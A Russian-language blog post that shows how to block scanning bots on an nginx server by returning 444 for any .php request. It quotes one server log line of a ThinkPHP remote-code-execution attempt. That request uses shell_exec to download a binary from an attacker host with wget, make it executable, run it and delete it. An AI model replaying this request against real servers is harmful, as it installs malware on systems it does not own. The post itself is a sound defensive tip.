Хвостат Хвостатыч (hvostat_hvostat) wrote,
Хвостат Хвостатыч
hvostat_hvostat

"Мамкины хакеры идут на хер"

Проблема:
Мамкины хакеры постоянно ломятся на сервер под управлением nginx и пытаются вызвать там говно, подобное:
GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget httd://pidary.gnoynye/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0" "-"


Решение:
Добавить соответствующем месте conf файла следующие строки:

location ~* ^.*\.php.*$ {
return 444;
}

__
Tags: nginx, php, безопасность, мир идиотов причудлив и разнообразен
Subscribe

  • "Электронные письма и гарантии"

    Пару дней назад поступила задача подфайнтюнить почтовый севервер заказчика. С некоторым испугом осознал, что последний раз тюнил почтовик очень давно…

  • "Добавим IQ квартире"

    Стало интересно, насколько моя "мойка воздуха" повышает влажность в комнате и насколько эффективно она это делает. Перспектива покупать отдельный…

  • "Твердотельный плеер"

    Рано или поздно в жизни наступает момент, когда у тебя либо всё, что ты хочешь УЖЕ есть, или это по каким-то причинам приобретать нецелесообразно…

  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 14 comments

  • "Электронные письма и гарантии"

    Пару дней назад поступила задача подфайнтюнить почтовый севервер заказчика. С некоторым испугом осознал, что последний раз тюнил почтовик очень давно…

  • "Добавим IQ квартире"

    Стало интересно, насколько моя "мойка воздуха" повышает влажность в комнате и насколько эффективно она это делает. Перспектива покупать отдельный…

  • "Твердотельный плеер"

    Рано или поздно в жизни наступает момент, когда у тебя либо всё, что ты хочешь УЖЕ есть, или это по каким-то причинам приобретать нецелесообразно…